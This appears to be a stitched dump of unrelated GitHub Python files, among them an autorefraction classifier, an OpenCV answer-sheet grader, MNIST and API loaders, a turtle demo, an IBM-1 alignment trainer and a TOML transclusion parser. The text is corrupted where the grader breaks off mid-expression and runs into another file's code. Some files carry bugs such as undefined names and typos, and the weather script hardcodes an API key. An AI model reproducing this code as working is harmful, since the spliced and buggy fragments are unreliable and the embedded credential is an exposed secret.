pickle.load(open(modelPath, 'rb'))\n self.cylinderModelLoaded = True\n\n def LoadSphereClassifier(self,modelPath):\n self.sphModel = pickle.load(open(modelPath, 'rb'))\n self.sphereModelLoaded = True\n\n def PredictSphere(self,features):\n sphClass = None\n if self.sphereModelLoaded:\n sphClass = self.sphModel.predict(np.asanyarray(features).reshape(1,-1))\n return sphClass\n\n def PredictCylinder(self,features):\n cylClass = None\n if self.cylinderModelLoaded:\n cylClass = self.cylModel.predict(np.asanyarray(features).reshape(1,-1))\n return cylClass\n\n def ExportClassifier(self,classifier, fileName='trainedClassifier.sav'):\n # export a trained classifier\n # TODO: makek sure the classifier entered is of the right class\n pickle.dump(classifier, open(fileName,'wb'))\n\n def PlotFeatures(self,target='seDelta',eye='both',delta=0.25,plotType='scatter'):\n \"\"\"\n Plots features vs. target class either scatter plot or histograms.\n\n Parameters:\n -----------\n plotType:{'scatter','hist'}, default: 'scatter'\n Type of plot, either scatter of histogram\n eye: {'left', 'right', 'both'}, default: 'both'\n data to use for the plot\n target: {'seDelta', 'sphereDelta', 'cylinderDelta'}, default: 'seDelta'\n the Delta set\n delta {float}, default: 0.25\n positive scalar defining the set |Delta|<= delta.\n \"\"\"\n data = self.GetData(eye=eye)\n\n if target.lower()=='sedelta':\n y = data.loc[:,'SphericalEqDelta']\n elif target.lower() =='cylinderdelta':\n y = data.loc[:,'CylinderDelta']\n elif target.lower()=='spheredetla':\n y = data.loc[:,'SphereDelta']\n else:\n raise Exception('option target={} is not supported'.format(target))\n\n indsIn = np.where(np.abs(y)<=delta)[0]\n indsOut = np.where(np.abs(y)>delta)[0]\n\n keys = list(self.featureList.keys())\n # plt.figure(figsize=(5,5))\n for axIdx in range(len(self.featureList)):\n ax = plt.figure().add_subplot()\n # ax = plt.subplot(5,5,axIdx+1)\n\n if plotType.lower()=='scatter':\n ax.plot(data.loc[data.index[indsIn],keys[axIdx]],y.loc[y.index[indsIn]],'g.')\n ax.plot(data.loc[data.index[indsOut],keys[axIdx]],y.loc[y.index[indsOut]],'r.')\n plt.xlabel(keys[axIdx])\n plt.ylabel(target)\n elif np.isin(plotType.lower(),['hist','histogram']):\n h,bins = np.histogram(data.loc[data.index[indsIn],keys[axIdx]])\n ax.plot(bins[1:],h/np.sum(h))\n h,bins = np.histogram(data.loc[data.index[indsOut],keys[axIdx]])\n ax.plot(bins[1:],h/np.sum(h))\n elif plotType.lower()=='cumulative':\n h,bins = np.histogram(data.loc[data.index[indsIn],keys[axIdx]])\n ax.plot(bins[1:],np.cumsum(h/np.sum(h)))\n h,bins = np.histogram(data.loc[data.index[indsOut],keys[axIdx]])\n ax.plot(bins[1:],np.cumsum(h/np.sum(h)))\n\n def TestDistributionSimilarity(self,data1,data2,alpha=0.05):\n \"\"\"\n Perform two-sided Kolmogorov Smirnoff test to examine\n if two samples are drawn from the same continuous distribution.\n The samples used are those with |Delta|<=delta and |Delta|>delta,\n where Delta is either the spherical equivalent delta, the cylinder or sphere delta.\n If the test statistics is small or the p-value high, we cannot reject the\n null hypothesis that the two samples are drawn from the same distribution. \\n\n\n Parameters:\n ----------\n target: {'seDelta', 'cylnderDelta', 'sphereDelta'}, default: 'seDelta\n The Delta set, spherical equivalent delta, sphere or cylinder delta\n delta: float, default=0.25\n a positive scalar defining the Delta set\n eye: {'left','right','both'}, default='both'\n data to use\n alpha: float, default=0.05\n the confidence level of the KS test is: 1-alpha\n\n Output:\n --------\n res:\n a DataFrame including test statistics, p-value, and decision for the null hypothesis\n \"\"\"\n if alpha>1 or alpha<0:\n raise Exception('Non valid alpha values. alpha must be in the range (0,1).')\n\n\n # check that data1 and data2 have similar field names\n if (data1.keys()==data2.keys()).all() ==False:\n raise Exception('The two datasets must contain similar field names')\n\n keys = data1.keys()\n n = len(data1)\n m = len(data2)\n res = pd.DataFrame()\n for featIdx in range(len(keys)):\n # perform a k-s test for the similarity between the in and out groups\n k = stats.ks_2samp(data1.loc[:,keys[featIdx]],data2.loc[:,keys[featIdx]])\n res.loc[featIdx,'Feature'] = keys[featIdx]\n res.loc[featIdx,'KS'] = k.statistic\n res.loc[featIdx,'pvalue'] = k.pvalue\n res.loc[featIdx,'rejectH0'] = k.statistic>=(np.sqrt(-0.5*np.log(alpha/2))*np.sqrt((n+m)/(n*m)))\n res.loc[featIdx,'m'] = m\n res.loc[featIdx,'n'] = n\n\n return res\n\n def SelectFeaturesByKSTest(self,featureMat,labels,alpha=0.05,rejProp=0.5):\n \"\"\"\n Select features automatically according to those that show high level of\n seperation between distributions of |Delta|<=delta\n and |Delta|>delta, based on the Kolmogorov-Smirnoff two-sided test statistics\n The KS statistic's null hypothesis is that the two set are from the same\n continuous distribution.\n\n Parameters:\n -----------\n featureMat: DataFrame\n feature matrix as dataFrame, with keys corresponding to features\n target : {'seDelta', 'cylinderDelta', 'sphereDelta'}, default='seDelta'\n the Delta set: spherical equivalent delta, sphere or cylinder delta\n delta : float, default=0.25\n positive scalar defining the set |Delta|<=delta\n eye : {'left', 'right', 'both'} , default='both'\n data to use\n alpha : float, default=0.05\n defines the KS confidence interval as confidence = 1-alpha\n prop: float, default0.5\n in pairwise comparison, a feature is selected if the null hypothesis\n was rejected at least round(prop*(numClasses-1)) times\n prop must be strictly positive and smaller than 1\n Output:\n -------\n featureMat: DataFrame\n Dataframe with keys corresponding to selected features\n \"\"\"\n\n # Check that the number of labels matches number of observtions\n if len(featureMat)!=len(labels):\n raise Exception('Number of rows in featureMat must match that in labels vector')\n\n # Get all unique labels\n uLabels = np.unique(labels)\n numClasses = len(uLabels)\n labelInds = list(range(numClasses))\n # get all unique labels pairs\n labelPairs = list(itertools.product(labelInds,repeat=2))\n indsList = np.ndarray(shape=(numClasses,numClasses),dtype=list)\n for lIdx in labelPairs:\n # print('Comparing classes {} and {}'.format(lIdx[0],lIdx[1]))\n inds1 = featureMat.index[np.where(labels==lIdx[0])[0]]\n inds2 = featureMat.index[np.where(labels==lIdx[1])[0]]\n data1 = featureMat.loc[inds1]\n data2 = featureMat.loc[inds2]\n res = self.TestDistributionSimilarity(data1,data2,alpha=alpha)\n indsList[lIdx[0],lIdx[1]]= res.index[np.where(res['rejectH0']==True)[0]]\n\n numFeatures = len(featureMat.keys())\n indScore = np.zeros(shape=numFeatures,dtype=np.int)\n for i1Idx in range(numClasses):\n for i2Idx in range(numClasses):\n for fIdx in indsList[i1Idx,i2Idx]:\n indScore[fIdx]+=1\n indScore = indScore/2\n\n featureInds = np.where(indScore>=np.round(rejProp*(numClasses-1)))[0]\n featureMat = featureMat.loc[:,featureMat.keys()[featureInds]]\n self.featuresUsed = list(self.featureList.keys())[featureInds]\n return featureMat\n\n def SelectFeatures(self,fMat,labels,mode='k_best',alpha=0.05):\n '''\n Select features based on alpha threshold\n '''\n if len(labels)!=len(fMat):\n raise Exception('The number labels must match the number of rows in featureMat')\n\n # Normalize features between 0 and 1\n # fMat = featureMat.copy()\n for k in fMat.keys():\n fMat[k] = (fMat[k] -np.min(fMat[k]))/(np.max(fMat[k])- np.min(fMat[k]))\n selector = sklearn.feature_selection.GenericUnivariateSelect(mode=mode)\n # selector = sklearn.feature_selection.SelectFdr(score_func= sklearn.feature_selection.chi2,alpha=alpha)\n # selector = sklearn.feature_selection.SelectFpr(score_func= sklearn.feature_selection.chi2,alpha=alpha)\n # selector = sklearn.feature_selection.SelectKBest(score_func= sklearn.feature_selection.chi2,k=5)\n fit = selector.fit(fMat,labels)\n featInds = np.where(fit.get_support())[0]\n self.featuresUsed = fMat.keys()[featInds]\n print('Num features selected : {}'.format(len(self.featuresUsed)))\n fMat = fMat.loc[:,self.featuresUsed]\n return fMat\n\n @staticmethod\n def _ParseGender(genStr):\n if genStr.__class__==str:\n if genStr in ['f','F']:\n return 1\n elif genStr in ['m','M']:\n return 0\n else:\n return np.nan\n\n\n","repo_name":"almakonde/AutorefEyelib","sub_path":"Refraction/Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":71453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40289483805","text":"import cv2\nimport numpy as np\nimport utlis\nfrom PIL import Image, ImageDraw, ImageFont\n\n############################################\npath=\"1.jpg\"\nwidthImg =700\nheightImg =600\n\nsecimSayisi=4\nsorusayisi=10\n\n#CEVAP ANAHATARI\nans=[1, 3, 3, 2, 2, 2, 3, 1, 0, 2, 2, 1, 1, 0, 1, 1, 3, 1, 0,1 ] \n\n\n\n\n################# TEST ALANI ###############\ny=90\nxsol=280\nxsag=460\nw=132\nh=420\nesikdeger=200\n############################################\n\n################# öĞRENCİ NUMARASI #########\nox=70\noy=105\now=172\noh=370\n############################################\n\nwebcamFeed=True\ncameraNo=0\n\ncap=cv2.VideoCapture(cameraNo)\ncap.set(10,150)\ncap.set(28,10) #focus ayar\n\nwhile True:\n if webcamFeed:success,img=cap.read()\n #if False:img=cv2.imread(path)\n else:img=cv2.imread(path)\n\n img=cv2.resize(img,(widthImg ,heightImg))\n img=cv2.rotate(img, cv2.ROTATE_180)\n imgCountours=img.copy()\n imageFinal=img.copy()\n imgBiggestCountours=img.copy()\n\n imgGray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n imgBlur=cv2.GaussianBlur(imgGray,(5,5),1)\n imgCanny=cv2.Canny(imgBlur,10,50)\n\n try:\n #FIND ALL COUNTERS\n countours,hierarchy=cv2.findContours(imgCanny,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n cv2.drawContours(imgCountours,countours,-1,(0,255,0),10)\n\n #FIND RECTANGLES\n rectCon=utlis.rectContour(countours)\n biggestContour=utlis.getCornerPoints(rectCon[0])\n #print(biggestContour)\n \n if biggestContour.size!=0:\n cv2.drawContours(imgBiggestCountours,biggestContour,-1,(0,255,0),20)\n biggestContour=utlis.reorder(biggestContour)\n pts1 = np.float32(biggestContour) # PREPARE POINTS FOR WARP\n pts2 = np.float32([[0, 0],[widthImg, 0], [0, heightImg],[widthImg, heightImg]]) # PREPARE POINTS FOR WARP\n matrix = cv2.getPerspectiveTransform(pts1, pts2) # GET TRANSFORMATION MATRIX\n imgWarpColored = cv2.warpPerspective(img, matrix, (widthImg, heightImg)) # APPLY WARP PERSPECTIVE\n\n #APPLY TRESHOLD\n\n imgWarpGray=cv2.cvtColor(imgWarpColored,cv2.COLOR_BGR2GRAY)\n imgThresh=cv2.threshold(imgWarpGray,100,255,cv2.THRESH_BINARY_INV)[1]\n\n #boxes=utlis.splitBoxes(imgThresh)\n #cv2.imshow(\"test\",boxes[1])\n \n \n\n crop_imgSol = imgThresh[y:y+h, xsol:(xsol+w)]\n crop_imgSag = imgThresh[y:y+h, xsag:(xsag+w)]\n crop_imgOgrenciNu = imgThresh[oy:oy+oh, ox:(ox+ow)]\n\n #cv2.imshow(\"cropped\", crop_imgOgrenciNu)\n #cv2.imwrite(\"croppedsol.jpg\",crop_imgSol)\n #cv2.imwrite(\"croppedsag.jpg\",crop_imgSag)\n\n boxesSol=utlis.splitBoxes(crop_imgSol)\n boxesSag=utlis.splitBoxes(crop_imgSag)\n boxesOgrenciNu=utlis.splitBoxesOgrenciNu(crop_imgOgrenciNu)\n \n \n sorusayisi=20\n #GETTING NOPIXEL VALUES OF EACH\n myPixelVal=np.zeros((sorusayisi,secimSayisi))\n \n myPixelValOgrenciNu=np.zeros((4,10))\n countC=0\n countR=0\n\n for image in boxesOgrenciNu:\n totalPixels=cv2.countNonZero(image)\n myPixelValOgrenciNu[countR][countC]=totalPixels\n countC+=1\n if(countC==10):countR+=1;countC=0\n #print(myPixelValOgrenciNu)\n \n countC=0\n countR=0\n\n for image in boxesSol:\n totalPixels=cv2.countNonZero(image)\n myPixelVal[countR][countC]=totalPixels\n countC+=1\n if(countC==secimSayisi):countR+=1;countC=0\n #print(myPixelVal)\n \n for image in boxesSag:\n totalPixels=cv2.countNonZero(image)\n myPixelVal[countR][countC]=totalPixels\n countC+=1\n if(countC==secimSayisi):countR+=1;countC=0\n\n\n #FINDING INDEX VALUES OF THE MARKINGS\n\n myIndexOgrenciNu=[]\n for x in range(0,4):\n arr=myPixelValOgrenciNu[x]\n #print(\"arr\",arr)\n myIndexVal=np.where(arr==np.amax(arr))\n #print(myIndexVal[0])\n myIndexOgrenciNu.append(myIndexVal[0][0])\n ogrenciNumarasi=str(myIndexOgrenciNu[0])+str(myIndexOgrenciNu[1])+str(myIndexOgrenciNu[2])+str(myIndexOgrenciNu[3])\n #print('Öğrenci numarası {}'.format(ogrenciNumarasi))\n\n \n #cv2.imshow('mum',utlis.showNumber2(imgWarpColored,myIndexOgrenciNu,4,10,ox,oy,ow,oh))\n \n myIndex=[]\n for x in range(0,sorusayisi):\n isaretsayisi=0\n arr=myPixelVal[x]\n #print(\"arr-\"+str(x),arr)\n print('max',np.amax(arr))\n #print('sayı',np.count_nonzero(arr>esikdeger))\n isaretsayisi=np.count_nonzero(arr>esikdeger)\n enfazla=np.amax(arr)\n if isaretsayisi>1:\n myIndexVal[0][0]=5 #iki ve dahafazla işaretlenmiş\n elif esikdegerHBB', f.read(4))\n shape = tuple(struct.unpack('>I', f.read(4))[0] for d in range(dims))\n return np.fromstring(f.read(), dtype=np.uint8).reshape(shape)\n\ndef load_data():\n '''\n return a tuple of X_train, y_train, X_test, y_test where:\n X is a matrix of examples (one example one row)\n y is a column vector of labels\n '''\n x_train = _read_idx(TRAIN_DATA_PATH)\n y_train = _read_idx(TRAIN_LABELS_PATH)\n x_test = _read_idx(TEST_DATA_PATH)\n y_test = _read_idx(TEST_LABELS_PATS)\n return x_train, y_train, x_test, y_test\n\n","repo_name":"LoGosX/handwritten-digit-recognition","sub_path":"load_image_data.py","file_name":"load_image_data.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23033822443","text":"#!/usr/bin/env python\n# -*- coding: latin-1 -*-\nimport requests\nimport json\nfrom cuarto import *\nfrom escenarios import *\n\n\ndef get_data_api():\n try:\n x = requests.get('https://api-escapamet.vercel.app/')\n api = json.loads(x.text)\n return api\n except:\n print('No se pudo extraer los datos de la API')\n return []\n\napi = get_data_api()\n\nfor i, dic in enumerate(api): # crea los objetos cuarto con los datos de la API\n if dic['name'] == 'Biblioteca':\n biblioteca = Cuarto(dic['name'], dic['objects'], biblioteca_escenario)\n elif dic['name'] == 'Laboratorio SL001':\n laboratorio_sl = Cuarto(dic['name'], dic['objects'], laboratorio_sl_escenario)\n elif dic['name'] == 'Plaza Rectorado':\n plaza_rectorado = Cuarto(dic['name'], dic['objects'], plaza_rectorado_escenario)\n elif dic['name'] == 'Pasillo Laboratorios ':\n pasillo_labs = Cuarto(dic['name'], dic['objects'], pasillo_labs_escenario)\n else:\n cuarto_servidores = Cuarto(dic['name'], dic['objects'], cuarto_servidores_escenario)\n\nbiblioteca.definir_posiciones(pasillo_labs, plaza_rectorado)\nlaboratorio_sl.definir_posiciones(cuarto_servidores, pasillo_labs)\nplaza_rectorado.definir_posiciones(False, biblioteca)\npasillo_labs.definir_posiciones(laboratorio_sl, biblioteca)\ncuarto_servidores.definir_posiciones(False, laboratorio_sl)\n\n","repo_name":"sabucds/proyecto-algoritmos","sub_path":"manejo_api.py","file_name":"manejo_api.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8788655696","text":"from turtle import Turtle\r\nt=Turtle()\r\n\r\ndef up():\r\n if not(t.heading() == 90):\r\n t.setheading(90)\r\n t.fd(50)\r\n else:\r\n t.fd(50)\r\n \r\ndef down():\r\n if not(t.heading() == 270):\r\n t.setheading(270)\r\n t.fd(50)\r\n else:\r\n t.fd(50)\r\n \r\ndef right():\r\n if not (t.heading() == 0):\r\n t.setheading(0)\r\n t.fd(50)\r\n else:\r\n t.fd(50)\r\n \r\ndef left():\r\n if not (t.heading() ==180):\r\n t.setheading(180)\r\n t.fd(50)\r\n else:\r\n t.fd(50)\r\n\r\ndef undo_button():\r\n t.undo()\r\n\r\ndef pen_up():\r\n t.penup()\r\n\r\ndef pen_down():\r\n t.pendown()\r\n\r\ndef hide():\r\n t.hideturtle()\r\n \r\ndef keyboard_commands():\r\n t.screen.onkey(up,\"Up\")\r\n t.screen.onkey(down,\"Down\")\r\n t.screen.onkey(right,\"Right\")\r\n t.screen.onkey(left,\"Left\")\r\n t.screen.onkey(undo_button,\"End\")\r\n t.screen.onkey(pen_up,\"u\")\r\n t.screen.onkey(pen_down,\"d\")\r\n t.screen.onkey(hide,\"h\")\r\n t.screen.listen()\r\n\r\nkeyboard_commands()\r\n","repo_name":"nmessa/Dover-Girls-Coding-2018_2019","sub_path":"Turtle Graphics/turtleKeyboard.py","file_name":"turtleKeyboard.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37806438811","text":"import collections\nimport data_load\nimport pickle\ndef dic_build(vocabulary_size = 200000):\n '''\n 构建词典,和按顺序的全部语料。用pickle存储\n :return:\n '''\n\n count = [['unk',-1]]\n words = data_load.load_w2c_textcn_dataset()\n # 注意这里Counter返回的类型\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n dictionary = dict()\n\n for word, _ in count:\n # print(dictionary)\n dictionary[word] = len(dictionary)\n # data是label\n data = list()\n unk_count = 0\n for word in words:\n if word in dictionary:\n index = dictionary[word]\n else:\n index = 0 # dictionary['UNK']\n unk_count = unk_count + 1\n data.append(index)\n count[0][1] = unk_count\n\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n with open('./data/dict_word_index.txt','wb') as f:\n pickle.dump(dictionary, f)\n with open(\"./data/data.txt\", \"wb\") as f:\n pickle.dump(data, f)\n with open(\"./data/dict_index_word.txt\",\"wb\") as f:\n pickle.dump(reverse_dictionary, f)\n\nif __name__ ==\"__main__\":\n dic_build()","repo_name":"xsh884826402/WordEmbedding","sub_path":"dic_build.py","file_name":"dic_build.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24338055517","text":"import requests \n\nAPI_KEY = \"4f4d0a95f3131789cb559719ff87d5bd\"\nBASE_URL = \"http://api.openweathermap.org/data/2.5/weather\"\n\ndef k_to_f(k):\n return ((k - 273.15) * (9/5)) + 32\n\n\n\ndef format(data):\n city = data[\"name\"] #City name\n temp = round(k_to_f(data[\"main\"][\"temp\"]), 2)\n kelvin_real = data['main']['feels_like']\n real_feel = round(k_to_f(kelvin_real), 2)\n max_temp = round(k_to_f(data[\"main\"][\"temp_max\"]), 2)\n min_temp = round(k_to_f(data[\"main\"][\"temp_min\"]), 2)\n description = data['weather'][0][\"description\"] #Description\n\n string = f\"For today in {city}, the tempurature is {temp}F with a real feel of {real_feel}F. You can expect {description}s with a high of {max_temp}F and a low of {min_temp}F.\"\n\n return string\n\ndef main():\n while(True):\n city = input(\"Enter a city name or 'q' to quit: \")\n if(city.lower() == 'q'):\n print(\"We're sad to see you go...\")\n break;\n request_url = f\"{BASE_URL}?appid={API_KEY}&q={city}\"\n response = requests.get(request_url)\n\n if response.status_code == 200:\n data = response.json()\n print(format(data))\n else: \n code = response.status_code\n print(f\"{code} error occured.\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"gregSWEN/Python-Scripts","sub_path":"Weather API/Weather.py","file_name":"Weather.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70264748249","text":"import pickle\nimport os\nfrom math import log\nfrom collections import Counter\nfrom lm_train import lm_train\nfrom log_prob import log_prob\nfrom preprocess import preprocess\n\ndef align_ibm1(train_dir, num_sentences, max_iter, fn_AM):\n \"\"\"\n Implements the training of IBM-1 word alignment algoirthm.\n We assume that we are implemented P(foreign|english)\n\n INPUTS:\n train_dir : (string) The top-level directory name containing data\n e.g., '/u/cs401/A2_SMT/data/Hansard/Testing/'\n num_sentences : (int) the maximum number of training sentences to consider\n max_iter : (int) the maximum number of iterations of the EM algorithm\n fn_AM : (string) the location to save the alignment model\n\n OUTPUT:\n AM : (dictionary) alignment model structure\n\n The dictionary AM is a dictionary of dictionaries where AM['english_word']['foreign_word']\n is the computed expectation that the foreign_word is produced by english_word.\n\n LM['house']['maison'] = 0.5\n \"\"\"\n AM = {}\n data = {} # a dictionary keep track coresponding English-French translation\n # Read training data\n train_corpus = read_hansard(train_dir, num_sentences)\n # print('finish AM reading')\n # count for all possible English-French translation\n for pair in train_corpus:\n data_sent = initialize(pair)\n for key in data_sent:\n # only add unique French word to the list\n if key in data:\n for word in data_sent[key]:\n if word not in data[key]:\n data[key].append(word)\n else:\n data[key] = data_sent[key]\n\n # Initialize AM uniformly\n # Set tcount(f, e) and total(e) to 0 first for reference\n tcount_init = {}\n total_init = {}\n\n for e_word in data:\n AM[e_word] = {}\n tcount_init[e_word] = {}\n total_init[e_word] = 0\n count = len(data[e_word])\n for f_word in data[e_word]:\n AM[e_word][f_word] = 1/count\n tcount_init[e_word][f_word] = 0\n # print('finish AM initialization')\n\n # Iterate between E and M steps\n for _ in range(max_iter):\n tcount = tcount_init\n total = total_init\n for pair in train_corpus:\n F = Counter(pair[0].split()[1:-1])\n for f in F:\n denom_c = 0\n E = Counter(pair[1].split()[1:-1])\n for e in E:\n denom_c += AM[e][f] * F[f]\n for e in E:\n tcount[e][f] += AM[e][f] * F[f] * E[e] / denom_c\n total[e] += AM[e][f] * F[f] * E[e] / denom_c\n for e in total:\n for f in tcount[e]:\n AM[e][f] = tcount[e][f] / total[e]\n\n AM['SENTSTART'] = {'SENTSTART':1}\n AM['SENTEND'] = {'SENTEND':1}\n #Save Model\n with open(fn_AM+'.pickle', 'wb') as handle:\n pickle.dump(AM, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n return AM\n\n# ------------ Support functions --------------\ndef read_hansard(train_dir, num_sentences):\n \"\"\"\n Read up to num_sentences from train_dir.\n\n INPUTS:\n train_dir : (string) The top-level directory name containing data\n e.g., '/u/cs401/A2_SMT/data/Hansard/Testing/'\n num_sentences : (int) the maximum number of training sentences to consider\n\n\n Make sure to preprocess!\n Remember that the i^th line in fubar.e corresponds to the i^th line in fubar.f.\n\n Make sure to read the files in an aligned manner.\n \"\"\"\n sent_count = 0\n data = []\n for subdir, dirs, files in os.walk(train_dir):\n # assume we only have pairs of .e and .f file with same file name\n file_names = []\n # first preprocess to get array of file name pair\n for file in files:\n if file[:-2] not in file_names:\n file_names.append(file[:-2])\n for file in file_names:\n eng_f = os.path.join(subdir, file + '.e')\n fre_f = os.path.join(subdir, file + '.f')\n data_e = []\n data_f = []\n with open(eng_f, 'r') as f:\n data_e = f.readlines()\n with open(fre_f, 'r') as f:\n data_f = f.readlines()\n assert len(data_e) == len(data_f), \\\n \"English file and French file have different length!\\nFile name: \" + file\n\n for line in range(len(data_e)):\n pre = (preprocess(data_f[line][:-1], 'f'), preprocess(data_e[line][:-1], 'e'))\n data.append(pre)\n sent_count += 1\n if sent_count >= num_sentences:\n return data\n return data\n\ndef initialize(pair):\n \"\"\"\n INPUT:\n pair: a French-English alignment\n\n OUTPUT:\n data: a dictionary that use English word as key and track all possible unique coresponding\n French words\n\n Initialize alignment model uniformly.\n Only set non-zero probabilities where word pairs appear in corresponding sentences.\n \"\"\"\n data = {}\n # remove SENTSTART and SENTEND\n fre = pair[0].split()[1:-1]\n eng = pair[1].split()[1:-1]\n for word in eng:\n if word not in data:\n data[word] = []\n for f_word in fre:\n if f_word not in data[word]:\n data[word].append(f_word)\n return data\n","repo_name":"jerryczy/csc401_nlp","sub_path":"statistical_machine_translation/align_ibm1.py","file_name":"align_ibm1.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1326170673","text":"import PIL\nfrom PIL import ImageFont\nfrom PIL import Image\nfrom PIL import ImageDraw\n\n# read image and convert to RGB\nimage = Image.open(\"readonly/msi_recruitment.gif\")\nimage = image.convert('RGB')\n\nwidth = image.size[0]\nheight = image.size[1]\n\nimg = Image.new('RGB', (width, height + 60), (0, 0, 0))\nimages = []\nintensity = [0.1, 0.5, 0.9]\n\nx = 20\ny = height\nword_size = 50\nword_css = \"readonly/fanwood-webfont.ttf\"\nsetFont = ImageFont.truetype(word_css, word_size)\n\nfor i in range(3):\n for j in range(3):\n for x in range(width):\n for y in range(height):\n pixel = image.getpixel((x, y))\n if i == 0:\n r = int(pixel[0] * intensity[j])\n g = pixel[1]\n b = pixel[2]\n img.putpixel((x, y), (r, g, b))\n if i == 1:\n r = pixel[0]\n g = int(pixel[1] * intensity[j])\n b = pixel[2]\n img.putpixel((x, y), (r, g, b))\n if i == 2:\n r = pixel[0]\n g = pixel[1]\n b = int(pixel[2] * intensity[j])\n img.putpixel((x, y), (r, g, b))\n\n draw = ImageDraw.Draw(img)\n strs = \"channel \" + str(i) + \" intensity \" + str(intensity[j])\n draw.text((0, height), strs, font=setFont, fill=(255, 255, 255), direction=None)\n\n images.append(img)\n img = Image.new('RGB', (width, height + 60), (0, 0, 0))\n\n# create a contact sheet from different brightnesses\nfirst_image = images[0]\ncontact_sheet = PIL.Image.new(first_image.mode, (first_image.width * 3, first_image.height * 3))\nx = 0\ny = 0\n\nfor img in images:\n # Lets paste the current image into the contact sheet\n contact_sheet.paste(img, (x, y))\n # Now we update our X position. If it is going to be the width of the image, then we set it to 0\n # and update Y as well to point to the next \"line\" of the contact sheet.\n if x + first_image.width == contact_sheet.width:\n x = 0\n y = y + first_image.height\n else:\n x = x + first_image.width\n\n# resize and display the contact sheet\ncontact_sheet = contact_sheet.resize((int(contact_sheet.width / 2), int(contact_sheet.height / 2)))\ndisplay(contact_sheet)\n","repo_name":"DimonYin/Coursera_Courses_Dimon_Yin","sub_path":"Python 3 Programming Specialization/Python Project _pillow _tesseract and opencv/Assignment 1_Building a Better Contact Sheet.py","file_name":"Assignment 1_Building a Better Contact Sheet.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10927681739","text":"# -*- coding: utf-8 -*-\n\"\"\"Additional Source to transclude tomlkit with URL and files.\"\"\"\n\nfrom pathlib import Path\nfrom textwrap import dedent as _\nfrom typing import Optional\nfrom typing import Union\n\nfrom tomlkit.parser import Parser as BaseParser\nfrom tomlkit.toml_document import TOMLDocument\n\nfrom drytoml import logger\nfrom drytoml.locate import deep_find\nfrom drytoml.merge import TomlMerger\nfrom drytoml.types import Url\nfrom drytoml.utils import request\n\nDEFAULT_EXTEND_KEY = \"__extends\"\n\n\nclass Parser(BaseParser):\n \"\"\"Extend tomlkit parser to allow transclusion.\"\"\"\n\n def __init__(\n self,\n string: str,\n extend_key=DEFAULT_EXTEND_KEY,\n reference: Optional[Union[str, Path, Url]] = None,\n level=0,\n ):\n \"\"\"Construct a transclusion-enabled toml parser.\n\n Args:\n string: Raw toml content.\n extend_key: key to look for to init transclusion.\n reference: Reference for the source of the content\n (eg url, file, etc).\n level: Number of parent documents previously parsed to\n instantiate this.\n \"\"\"\n self.extend_key = extend_key\n self.reference = reference or Path.cwd()\n self.from_string = not reference\n self.level = level\n super().__init__(string)\n\n def __repr__(self) -> str:\n \"\"\"Enable parser visual differentiation from repr.\n\n Returns:\n A string of the form ``Parser(reference, extend_key)``\n\n Examples:\n\n >>> parser = Parser.from_file(\"pyproject.toml\")\n >>> parser\n Parser('pyproject.toml', extend_key='__extends')\n\n >>> content = parser.parse().as_string()\n >>> Parser(content)\n Parser('/path/to/dir' as cwd, (from string), extend_key='__extends')\n\n >>> Parser.factory(\"https://github.com/pytest-dev/pytest/blob/master/pyproject.toml\")\n Parser('https://github.com/pytest-dev/pytest/blob/master/pyproject.toml', extend_key='__extends')\n \"\"\"\n return \"{}Parser('{}'{}, extend_key='{}')\".format(\n self._log_indent,\n self.reference,\n \" as cwd, (from string)\" if self.from_string else \"\",\n self.extend_key,\n )\n\n @classmethod\n def from_file(cls, path, extend_key=DEFAULT_EXTEND_KEY, level=0):\n \"\"\"Instantiate a parser from file.\n\n Args:\n path: Path to an existing file with the toml contents.\n extend_key: kwarg to construct the parser.\n level: kwarg to construct the parser.\n\n Returns:\n Parser instantiated from received path.\n\n \"\"\"\n with open(path) as fp:\n raw = fp.read()\n return cls(raw, extend_key=extend_key, reference=path, level=level)\n\n @classmethod\n def from_url(cls, url, extend_key=DEFAULT_EXTEND_KEY, level=0):\n \"\"\"Instantiate a parser from url.\n\n Args:\n url: URL to an existing file with the toml contents.\n extend_key: kwarg to construct the parser.\n level: kwarg to construct the parser.\n\n Returns:\n Parser instantiated from received url.\n \"\"\"\n raw = request(url)\n return cls(raw, extend_key=extend_key, reference=url, level=level)\n\n @classmethod\n def factory(\n cls,\n reference: Union[str, Url, Path],\n extend_key=DEFAULT_EXTEND_KEY,\n parent_reference: Optional[Union[str, Path, Url]] = None,\n level=0,\n ):\n \"\"\"Instantiate a parser from url, string, or path.\n\n Args:\n reference: Existing file/url/path with the toml contents.\n extend_key: kwarg to construct the parser.\n parent_reference: Used to parse relative paths.\n level: kwarg to construct the parser.\n\n Returns:\n Parser instantiated from received reference.\n\n Raises:\n ValueError: Attempted to intantiate a parser with a relative\n path as reference, without a parent reference.\n \"\"\"\n\n if Url.validate(reference):\n return cls.from_url(\n reference,\n extend_key=extend_key,\n level=level,\n )\n\n path = Path(reference)\n if not path.is_absolute():\n if not parent_reference:\n raise ValueError(\"Must supply absolute path or parent\")\n path = 